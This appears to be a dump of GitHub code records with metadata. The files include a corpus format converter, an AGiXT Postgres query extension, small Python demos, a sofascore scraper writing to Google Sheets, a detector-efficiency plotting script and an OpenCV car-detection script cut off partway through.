"sys.argv", "line_number": 14, "usage_type": "attribute"}]}
+{"seq_id": "18754616760", "text": "#!/opt/python-2.7/bin/python2.7\n#\n# script can be run without invoking python because of shebang\n# will be run with correct version on Patas\n#\n# Code last updated on 5/26/2014 by Claire Jaja\n#\n# This script will convert documents from the AQUAINT2 format\n# to the AQUAINT format.\n\nimport sys\nfrom bs4 import BeautifulSoup\nfrom os import listdir, path, makedirs\n\ndef main():\n # argument is folder to put converted corpus\n converted_data = sys.argv[1]\n AQUAINT2 = \"/corpora/LDC/LDC08T25/data/\"\n\n # for every folder in AQUAINT2/data\n for folder in listdir(AQUAINT2):\n sys.stderr.write(\"Folder: \"+folder+\"\\n\")\n # create same folder in converted_data folder\n new_folder = path.join(converted_data,folder)\n if not path.exists(new_folder):\n makedirs(new_folder)\n # for every .xml file in that folder\n for file in [ x for x in listdir(path.join(AQUAINT2,folder)) if x.endswith(\".xml\") ]:\n sys.stderr.write(\"File: \"+file+\"\\n\")\n # create file with same name in newly created folder\n new_file = open(path.join(new_folder,file),'w')\n # parse xml with beautiful soup\n xml = open(path.join(AQUAINT2,folder,file),'r')\n soup = BeautifulSoup(xml)\n # gather doc ID, headline, and text\n docs = soup.find_all(\"doc\")\n doc_ids = []\n headlines = []\n text = []\n for doc in docs:\n doc_ids.append(doc['id'])\n if doc.headline:\n headlines.append(doc.headline.get_text())\n else:\n headlines.append(\"None\")\n text.append(doc.text)\n xml.close()\n # print out doc ID, headline, and text to newly created file\n for i in range(len(doc_ids)):\n new_file.write(\"\\n\")\n new_file.write(\" %s \\n\" % doc_ids[i])\n new_file.write(\"\\n\")\n if headlines[i]:\n new_file.write(\" %s \\n\" % headlines[i].encode('utf8'))\n new_file.write(\" %s \\n\" % text[i].encode('utf8'))\n new_file.write(\"\\n\")\n new_file.write(\" \\n\")\n new_file.close()\n\n\nif __name__ == '__main__':\n\tmain()\n", "repo_name": "amkahn/question-answering", "sub_path": "src/convert_AQUAINT2_to_AQUAINT_format.py", "file_name": "convert_AQUAINT2_to_AQUAINT_format.py", "file_ext": "py", "file_size_in_byte": 2351, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 26, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "name"}, {"api_name": "sys.stderr.write", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 34, "usage_type": "call"}]}
+{"seq_id": "2810922203", "text": "import logging\n\ntry:\n import psycopg2\nexcept ImportError:\n import sys\n import subprocess\n\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"psycopg2\"])\n import psycopg2\n\nimport psycopg2.extras\nimport logging\nfrom Extensions import Extensions\n\n\nclass postgres_database(Extensions):\n def __init__(\n self,\n POSTGRES_DATABASE_NAME: str = \"\",\n POSTGRES_DATABASE_HOST: str = \"\",\n POSTGRES_DATABASE_PORT: int = 5432,\n POSTGRES_DATABASE_USERNAME: str = \"\",\n POSTGRES_DATABASE_PASSWORD: str = \"\",\n **kwargs,\n ):\n self.agent_name = kwargs[\"agent_name\"] if \"agent_name\" in kwargs else \"gpt4free\"\n self.ApiClient = kwargs[\"ApiClient\"] if \"ApiClient\" in kwargs else None\n self.POSTGRES_DATABASE_NAME = POSTGRES_DATABASE_NAME\n self.POSTGRES_DATABASE_HOST = POSTGRES_DATABASE_HOST\n self.POSTGRES_DATABASE_PORT = POSTGRES_DATABASE_PORT\n self.POSTGRES_DATABASE_USERNAME = POSTGRES_DATABASE_USERNAME\n self.POSTGRES_DATABASE_PASSWORD = POSTGRES_DATABASE_PASSWORD\n self.commands = {\n \"Custom SQL Query in Postgres Database\": self.execute_sql,\n \"Get Database Schema from Postgres Database\": self.get_schema,\n }\n\n def get_connection(self):\n try:\n connection = psycopg2.connect(\n database=self.POSTGRES_DATABASE_NAME,\n host=self.POSTGRES_DATABASE_HOST,\n port=self.POSTGRES_DATABASE_PORT,\n user=self.POSTGRES_DATABASE_USERNAME,\n password=self.POSTGRES_DATABASE_PASSWORD,\n )\n return connection\n except Exception as e:\n logging.error(f\"Error connecting to Postgres Database. Error: {str(e)}\")\n return None\n\n async def execute_sql(self, query: str):\n if \"```sql\" in query:\n query = query.split(\"```sql\")[1].split(\"```\")[0]\n query = query.replace(\"\\n\", \" \")\n query = query.strip()\n logging.info(f\"Executing SQL Query: {query}\")\n connection = self.get_connection()\n cursor = connection.cursor(cursor_factory=psycopg2.extras.DictCursor)\n try:\n cursor.execute(query)\n rows = cursor.fetchall()\n cursor.close()\n connection.close()\n rows_string = \"\"\n # If there is only 1 row and 1 column, return the value as a string\n if len(rows) == 1 and len(rows[0]) == 1:\n return str(rows[0][0])\n # If there is more than 1 column and at least 1 row, return it as a CSV format\n if len(rows) >= 1 and len(rows[0]) > 1:\n # If there is more than 1 column and at least 1 row, return it as a CSV format, build column heading, and make sure each row value is quoted\n column_headings = []\n for column in cursor.description:\n column_headings.append(column.name)\n rows_string += \",\".join(column_headings) + \"\\n\"\n for row in rows:\n row_string = []\n for value in row:\n row_string.append(f'\"{value}\"')\n rows_string += \",\".join(row_string) + \"\\n\"\n return rows_string\n # If there is only 1 column and more than 1 row, return it as a CSV format\n if len(rows) > 1 and len(rows[0]) == 1:\n for row in rows:\n rows_string += f'\"{row[0]}\"\\n'\n return rows_string\n return rows_string\n except Exception as e:\n logging.error(f\"Error executing SQL Query: {str(e)}\")\n # Reformat the query if it is invalid.\n new_query = self.ApiClient.prompt_agent(\n agent_name=self.agent_name,\n prompt_name=\"Validate PostgreSQL\",\n prompt_args={\n \"database_type\": \"PostgreSQL\",\n \"schema\": await self.get_schema(),\n \"query\": query,\n },\n )\n return await self.execute_sql(query=new_query)\n\n async def get_schema(self):\n logging.info(f\"Getting schema for database '{self.POSTGRES_DATABASE_NAME}'\")\n connection = self.get_connection()\n cursor = connection.cursor(cursor_factory=psycopg2.extras.DictCursor)\n cursor.execute(\n f\"SELECT schema_name FROM information_schema.schemata WHERE schema_name NOT IN ('pg_catalog', 'information_schema');\"\n )\n schemas = cursor.fetchall()\n sql_export = []\n key_relations = []\n for schema in schemas:\n schema_name = schema[\"schema_name\"]\n cursor.execute(\n f\"\"\"\n SELECT kcu.table_name as foreign_table, rel_tco.table_name as primary_table,\n kcu.column_name as foreign_column, rel_kcu.column_name as primary_column\n FROM information_schema.table_constraints tco\n JOIN information_schema.key_column_usage kcu \n ON kcu.constraint_name = tco.constraint_name\n AND kcu.constraint_schema = tco.constraint_schema\n JOIN information_schema.referential_constraints rco ON tco.constraint_name = rco.constraint_name\n AND tco.constraint_schema = rco.constraint_schema\n JOIN information_schema.key_column_usage rel_kcu ON rco.unique_constraint_name = rel_kcu.constraint_name\n AND rco.unique_constraint_schema = rel_kcu.constraint_schema\n JOIN information_schema.table_constraints rel_tco ON rel_kcu.constraint_name = rel_tco.constraint_name\n AND rel_kcu.constraint_schema = rel_tco.constraint_schema\n WHERE tco.constraint_type = 'FOREIGN KEY' AND tco.table_schema = '{schema_name}' \n \"\"\"\n )\n relations = cursor.fetchall()\n if relations:\n for relation in relations:\n key_relations.append(\n f\"-- {relation['foreign_table']}.{relation['foreign_column']} can be joined with \"\n f\"{relation['primary_table']}.{relation['primary_column']}\"\n )\n\n cursor.execute(\n f\"\"\"\n SELECT table_name, column_name, data_type, column_default, is_nullable, ordinal_position \n FROM information_schema.columns \n WHERE table_schema = '{schema_name}';\n \"\"\"\n )\n rows = cursor.fetchall()\n\n table_columns = {}\n for row in rows:\n table_name = row[\"table_name\"]\n if table_name not in table_columns:\n table_columns[table_name] = []\n column_details = {\n \"column_name\": row[\"column_name\"],\n \"data_type\": row[\"data_type\"],\n \"column_default\": row[\"column_default\"],\n \"is_nullable\": row[\"is_nullable\"],\n }\n table_columns[table_name].append(column_details)\n\n for table_name, columns in table_columns.items():\n create_table_sql = f\"CREATE TABLE {schema_name}.{table_name} (\"\n for column in columns:\n column_sql = f\"{column['column_name']} {column['data_type']}\"\n if column[\"column_default\"]:\n column_sql += f\" DEFAULT {column['column_default']}\"\n if column[\"is_nullable\"] == \"NO\":\n column_sql += \" NOT NULL\"\n create_table_sql += f\"{column_sql}, \"\n create_table_sql = create_table_sql.rstrip(\", \") + \");\"\n sql_export.append(create_table_sql)\n connection.close()\n return \"\\n\\n\".join(sql_export + key_relations)\n", "repo_name": "Josh-XT/AGiXT", "sub_path": "agixt/extensions/postgres_database.py", "file_name": "postgres_database.py", "file_ext": "py", "file_size_in_byte": 8038, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2174, "dataset": "github-code", "pt": "53", "api": [{"api_name": "subprocess.check_call", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 9, "usage_type": "attribute"}, {"api_name": "Extensions.Extensions", "line_number": 17, "usage_type": "name"}, {"api_name": "psycopg2.connect", "line_number": 41, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 50, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "psycopg2.extras", "line_number": 60, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 90, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 104, "usage_type": "call"}, {"api_name": "psycopg2.extras", "line_number": 106, "usage_type": "attribute"}]}
+{"seq_id": "3673933445", "text": "from typing import NamedTuple\n\nclass MyTuple(NamedTuple):\n id: int\n name: str\n\nt1 = MyTuple(1, \"A\")\nt2 = MyTuple(*(2, \"B\"))\nt3 = MyTuple(**{\n \"id\": 3,\n \"name\": \"C\"})\nt4 = MyTuple._make([4, \"D\"])\n\nprint(t1)\nprint(t2)\nprint(t3)\nprint(t4)", "repo_name": "robobe/robobe.github.io", "sub_path": "examples/python/ds/named_tuple/hello.py", "file_name": "hello.py", "file_ext": "py", "file_size_in_byte": 247, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.NamedTuple", "line_number": 3, "usage_type": "name"}]}
+{"seq_id": "3930685816", "text": "import nltk\n\n#importing stop words library (or not library !)\n\nnltk.download('stopwords')\n\nfrom nltk.corpus import stopwords\n\nfrom nltk import word_tokenize\n\n#langues reconnues par python stopwords\n\nlanguage = ['turkish', 'tajik', 'swedish', 'spanish', 'slovene', 'russian', 'romanian', 'portuguese', 'norwegian', 'nepali', 'kazakh', 'italian', 'indonesian', 'hungarian', 'greek', 'german', 'french', 'finnish', 'english', 'dutch', 'danish', 'azerbaijani', 'arabic']\npotentiel = []\nreconnu = []\ndico = {}\ndef reclangue() :\n text = str(input('type here '))\n tokenizedtxt = word_tokenize(text)\n for lang in language : \n stpwrs = (stopwords.words(lang))\n for word in tokenizedtxt : \n if word in stpwrs : \n potentiel.append(lang)\n for lng in potentiel : \n if lng not in reconnu :\n reconnu.append(lng)\n \n for lng in reconnu : \n cal = potentiel.count(lng)\n dico[lng] = cal\n dict(sorted(dico.items(), key=lambda item: item[1]))\n \n return print(max(dico, key=dico.get)) \n\nreclangue()\n", "repo_name": "MohdSarar/Language-Recognition-NLTK", "sub_path": "lang_reco.py", "file_name": "lang_reco.py", "file_ext": "py", "file_size_in_byte": 1083, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nltk.download", "line_number": 5, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 19, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 21, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 21, "usage_type": "name"}]}
+{"seq_id": "1167423623", "text": "\"\"\"\nMy Camera Application\nouthor : Sa'ad\n\n\"\"\"\n\nimport sys\n\nimport cv2\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5.QtGui import QIcon, QImage, QPixmap\nfrom PyQt5.QtWidgets import *\n\n\nclass Window(QWidget) :\n # My Camera Application\n\n def __init__(self) :\n super().__init__() \n\n # variables for app window\n self.window_width = 640\n self.window_height = 400\n\n # image variables\n self.img_width = 640\n self.img_height = 400\n\n # setup the window\n self.setWindowTitle(\"My Camera App\")\n self.setGeometry(100, 100, self.window_width, self.window_height)\n self.setFixedSize(self.window_width, self.window_height)\n\n self.camera_icon = QIcon(cap_icon_path)\n\n # setup timer\n self.timer = QTimer()\n self.timer.timeout.connect(self.update)\n\n self.ui()\n\n def ui(self) :\n # contains all UI things\n # layout\n grid = QGridLayout()\n self.setLayout(grid)\n\n # image label\n self.image_label = QLabel(self)\n self.image_label.setGeometry(0, 0, self.img_width, self.img_height)\n\n # capture btn\n self.capture_btn = QPushButton(self)\n self.capture_btn.setIcon(self.camera_icon)\n self.capture_btn.setStyleSheet(\"border-radius: 30; border : 2px solid black; border-width : 3px\")\n self.capture_btn.setFixedSize(50, 50)\n self.capture_btn.clicked.connect(self.save_image)\n\n if not self.timer.isActive() :\n self.cap = cv2.VideoCapture(0)\n self.timer.start(20)\n\n grid.addWidget(self.capture_btn, 0, 0)\n grid.addWidget(self.image_label, 0 , 1)\n \n self.show()\n\n def update(self) :\n # update frames\n _, self.frame = self.cap.read()\n frame = cv2.cvtColor(self.frame, cv2.COLOR_BGR2RGB)\n height, width, channel = frame.shape\n step = channel * width\n\n q_frame = QImage(frame.data, width, height, step, QImage.Format_RGB888)\n self.image_label.setPixmap(QPixmap.fromImage(q_frame))\n\n def save_image(self) :\n # save image from camera\n print(\"saving image\")\n cv2.imwrite(\"my_img.jpg\", self.frame)\n\n def record(self) :\n # record video\n pass\n\n\ncap_icon_path = \"assets/icons/capture.png\"\n\n# run \napp = QApplication(sys.argv)\nwin = Window()\nsys.exit(app.exec_())\n", "repo_name": "Saad-001/learning-python-with-problem-solving", "sub_path": "week_3/module_10_lab_class_3/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2376, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtGui.QIcon", "line_number": 34, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 71, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 71, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 75, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage.Format_RGB888", "line_number": 75, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 76, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 76, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 91, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 93, "usage_type": "call"}]}
+{"seq_id": "22213329995", "text": "import pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nimport re\r\nimport gspread\r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nimport time\r\n\r\ndef findBlockHeight(soup):\r\n height = soup.find('div', attrs={'class': 'ReactVirtualized__Grid__innerScrollContainer'})\r\n try:\r\n b = re.split(': |;', str(height['style']))\r\n l = b[b.index(' max-height') + 1]\r\n except:\r\n return 0\r\n return round(float(l[:len(l)-2])+800)\r\n\r\ndef findMatchesArray(h,a):\r\n array=[]\r\n while (h <= a):\r\n driver.execute_script(f\"window.scrollTo(0, {h});\")\r\n time.sleep(1)\r\n data = driver.page_source\r\n soup = BeautifulSoup(data, \"html.parser\")\r\n h += 800\r\n t = soup.find_all('a', attrs={'data-id': True})\r\n try:\r\n for i in t:\r\n tteams = i.find('div', attrs={\"class\": \"sc-hLBbgP eIlfTT\"})\r\n line = str()\r\n for elem in tteams:\r\n # print(elem.text.strip())\r\n line += elem.text.strip() + \":\"\r\n score = i.find_all('div',\r\n attrs={'class': \"sc-hLBbgP sc-eDvSVe fuUKnP bMwHQt sc-9199a964-2 kgwLqG score-box\"})\r\n if score != []:\r\n line += score[0].text[0] + '/' + score[1].text[0] + \":\"\r\n live = i.find('div', attrs={'color': 'sofaSingles.live'})\r\n if live != None:\r\n line += 'live'\r\n if line not in array:\r\n array.append(line)\r\n except:\r\n z = 0\r\n return array\r\n\r\n# Connect to Google Sheets\r\nscope = ['https://www.googleapis.com/auth/spreadsheets',\r\n \"https://www.googleapis.com/auth/drive\"]\r\n\r\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(\"sofascore-parser.json\", scope)\r\nclient = gspread.authorize(credentials)\r\ngoogle_sh = client.create(\"Parser\")\r\ngoogle_sh.share('muradrmagomedov@gmail.com', perm_type='user', role='writer')\r\n\r\ndriver = webdriver.Chrome()\r\ndriver.get(\"https://www.sofascore.com/\")\r\ndata = driver.page_source\r\nsoup = BeautifulSoup(data, \"html.parser\")\r\nallmatches=[]\r\n#=======Find-all-urls-of sports=========================================================\r\nurls=[]\r\nx=[]\r\np=soup.find('div',attrs={'class':'sc-hLBbgP dRtNhU sc-12472a74-0 ijBjmq'}).find_all('a')\r\nfor elem in p:\r\n uurl='https://www.sofascore.com'+elem['href']\r\n if uurl not in urls and uurl!='https://www.sofascore.com/motorsport':\r\n urls.append(uurl)\r\n#=======end============================================================================\r\n#========Iterating through urls =======================================================\r\nfor elem in urls:\r\n driver.get(elem)\r\n time.sleep(1)\r\n data = driver.page_source\r\n soup = BeautifulSoup(data, \"html.parser\")\r\n#=======Find-matches-block-height=====================================================\r\n a = findBlockHeight(soup)\r\n h = 0\r\n#======================================================================================\r\n#========Iterating through page========================================================\r\n allmatches.append(findMatchesArray(h,a))\r\n\r\nfor i in range(len(allmatches)):\r\n for j in range(len(allmatches[i])):\r\n x.append(allmatches[i][j].split(':'))\r\n name=urls[i].split('/')[-1]\r\n if name=='':\r\n name='football'\r\n sheet=google_sh.add_worksheet(title=f'{name}',rows=1000,cols=4)\r\n df=pd.DataFrame(x)\r\n sheet.update(x)\r\n x = []\r\ngoogle_sh.del_worksheet(worksheet='Sheet1')\r\ndriver.close()\r\n", "repo_name": "aagadg/sofascore-parser", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "re.split", "line_number": 12, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 24, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name", "line_number": 51, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials", "line_number": 51, "usage_type": "name"}, {"api_name": "gspread.authorize", "line_number": 52, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 56, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 56, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 59, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 73, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 90, "usage_type": "call"}]}
+{"seq_id": "29702069407", "text": "import csv\r\nimport os\r\nimport math\r\nfrom datetime import datetime\r\nimport string\r\nimport numpy as np\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.stats import linregress\r\n\r\n\r\n#creates a list of all the csv files in the directory excluding the template\r\ncsvfiles = [os.path.join(root, name) for root, dirs, files in os.walk(\"./\") for name in files if name.endswith((\".csv\")) and name[-12:] != \"template.csv\"]\r\n\r\n\r\n#creates a dictionary associating each file with a list of its data\r\ndata = {}\r\nfor file in csvfiles:\r\n data[file] = []\r\n with open(file, 'rb') as csvfile:\r\n spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\r\n for row in spamreader:\r\n data[file].append(row[0])\r\n for i in range(1,7):\r\n data[file][i] = int(data[file][i])\r\n for i in range(7,16):\r\n data[file][i] = float(filter(lambda x: x in string.printable, data[file][i]))\r\n\r\n\r\n#combines the data into a dictionary keyed with names representing a chart\r\n# with a value as a list of lists of the data for a particular graph\r\ncharts = {}\r\nfor item in data:\r\n if data[item][16] not in charts:\r\n charts[data[item][16]] = [data[item]]\r\n else:\r\n charts[data[item][16]].append(data[item])\r\n\r\n\r\n# processes the data and calculations outputting tuples (pairs) of results to plot\r\ndatatoplot = {}\r\nfor date in charts:\r\n datatoplot[date] = []\r\n #memoize some of the processing\r\n processed = {}\r\n def findexpectation(setofdata,processed):\r\n activity = setofdata[7] * math.e ** (-math.log(2) * time / setofdata[8])\r\n s = setofdata[11]\r\n r = setofdata[12]\r\n solidangle = s ** 2 / (4 * math.pi * r ** 2)\r\n expec = 37000 * activity * setofdata[10] * setofdata[13] * solidangle\r\n processed[(time, setofdata[10], setofdata[13], setofdata[11], setofdata[12])] = expec\r\n return expec\r\n\r\n for setofdata in charts[date]:\r\n end = datetime(setofdata[4], setofdata[5], setofdata[6])\r\n start = datetime(setofdata[1], setofdata[2], setofdata[3])\r\n difference = end - start\r\n time = (difference.days + difference.seconds / 86400) / 365.2425\r\n energy = setofdata[9]\r\n #check memoized data\r\n if (time, setofdata[10], setofdata[13], setofdata[11], setofdata[12]) in processed:\r\n expectation = processed[(time, setofdata[10], setofdata[13], setofdata[11], setofdata[12])]\r\n #in case not already calculated, then calculate\r\n else:\r\n expectation = findexpectation(setofdata, processed)\r\n experimental = setofdata[14]\r\n efficiency = experimental / expectation\r\n datatoplot[date].append((energy, efficiency))\r\n\r\n\r\n\r\n#outputs data and graphs onto a pdf\r\nwith PdfPages('data.pdf') as pdf:\r\n plotting = sorted(datatoplot)\r\n\r\n for i in range(len(datatoplot)):\r\n x = []\r\n y = []\r\n for tup in datatoplot[plotting[i]]:\r\n x.append(tup[0])\r\n y.append(tup[1])\r\n\r\n # make the scatter plot\r\n plt.scatter(x, y, s=10, alpha=.5, marker='o')\r\n # determine best fit line\r\n par = np.polyfit(x, y, 1, full=True)\r\n slope=par[0][0]\r\n intercept=par[0][1]\r\n xl = [min(x), max(x)]\r\n yl = [slope*xx + intercept for xx in xl]\r\n plt.plot(xl, yl, '-r')\r\n\r\n #analyze data\r\n slope, intercept, rcorrelation, pcorrelation, stderr = linregress(x, y)\r\n #output y=mx+b and r^2 onto graph pdf\r\n plt.text(0, .95, \"y = \" + str(slope) + \"x + \" + str(intercept) + \", r squared = \" + str(rcorrelation))\r\n\r\n #output data points as text (ordered pairs) onto graph\r\n texts = {}\r\n for j in range(len(datatoplot[plotting[i]])):\r\n plt.text(0, .85 - j*.1 , datatoplot[plotting[i]][j])\r\n\r\n #label axes\r\n plt.xlabel('energy')\r\n plt.ylabel('efficiency')\r\n \r\n #set limits of x and y axes\r\n plt.ylim([0, 1])\r\n plt.xlim([0, 1400])\r\n\r\n #plot title\r\n plt.title(str(plotting[i]))\r\n\r\n pdf.savefig() # saves the current figure into a pdf page\r\n plt.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "meiaalsup/urop-detector-efficiency", "sub_path": "ProcessEnergies.py", "file_name": "ProcessEnergies.py", "file_ext": "py", "file_size_in_byte": 4218, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 13, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 21, "usage_type": "call"}, {"api_name": "string.printable", "line_number": 27, "usage_type": "attribute"}, {"api_name": "math.e", "line_number": 47, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 47, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 50, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_pdf.PdfPages", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "scipy.stats.linregress", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}]}
+{"seq_id": "18541708704", "text": "from datetime import datetime\nfrom dateutil import tz\nfrom shared.settings import TIMEZONE\n\ndef timezone_recovery(dt:datetime,timezone:str='') -> datetime:\n '''\n MongoDBから取得したISODate型はタイムゾーンが抜け落ちている。\n それの補正とタイムゾーンの付与を行ったdatetime型を返す。\n MongoDBから取得したISODate型の項目を使う場合、基本的に当関数を通じて使用すること。\n '''\n if timezone == '':\n UTC = tz.gettz(\"UTC\")\n dt = dt.replace(tzinfo=UTC)\n dt = dt.astimezone(TIMEZONE)\n else:\n UTC = tz.gettz(\"UTC\")\n dt = dt.replace(tzinfo=UTC)\n _ = tz.gettz(timezone)\n dt = dt.astimezone(_)\n return dt", "repo_name": "pubranko/BrownieAtelier", "sub_path": "app/shared/timezone_recovery.py", "file_name": "timezone_recovery.py", "file_ext": "py", "file_size_in_byte": 742, "program_lang": "python", "lang": "ja", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime", "line_number": 5, "usage_type": "name"}, {"api_name": "dateutil.tz.gettz", "line_number": 12, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 12, "usage_type": "name"}, {"api_name": "shared.settings.TIMEZONE", "line_number": 14, "usage_type": "argument"}, {"api_name": "dateutil.tz.gettz", "line_number": 16, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 16, "usage_type": "name"}, {"api_name": "dateutil.tz.gettz", "line_number": 18, "usage_type": "call"}, {"api_name": "dateutil.tz", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "21066190205", "text": "import numpy as np\r\nimport cv2\r\nimport time\r\n\r\n\r\ndef foofunction(x, y):\r\n a = []\r\n b = []\r\n c = []\r\n for i in range(0, len(x)):\r\n state = False\r\n for j in range(0, len(y)):\r\n if np.all(x[i] == y[j]):\r\n b.append(x[i])\r\n state = True\r\n if not state:\r\n a.append(x[i])\r\n\r\n for i in range(0, len(y)):\r\n state = False\r\n for j in range(0, len(x)):\r\n if np.all(x[j] == y[i]):\r\n state = True\r\n break\r\n if not state:\r\n c.append(y[i])\r\n return a, b, c\r\n\r\n\r\ndef labelformat(a):\r\n a = str(a)\r\n for i in range(len(a), 4):\r\n a = \"0\"+a\r\n return a\r\n\r\n\r\ncar_cascade = cv2.CascadeClassifier('haar_car.xml')\r\ninit = False\r\ncar_dataset = []\r\nframe_counter = 1\r\n\r\nfor i in range(1, 1701):\r\n img = cv2.imread(\"highway\\\\input\\\\in00\"+labelformat(i)+\".jpg\")\r\n car_dataset.append(img)\r\n\r\nall_cars = []\r\nid_vehicle = 1\r\n\r\nfor img in car_dataset:\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n cars = car_cascade.detectMultiScale(gray, 1.1, 5)\r\n 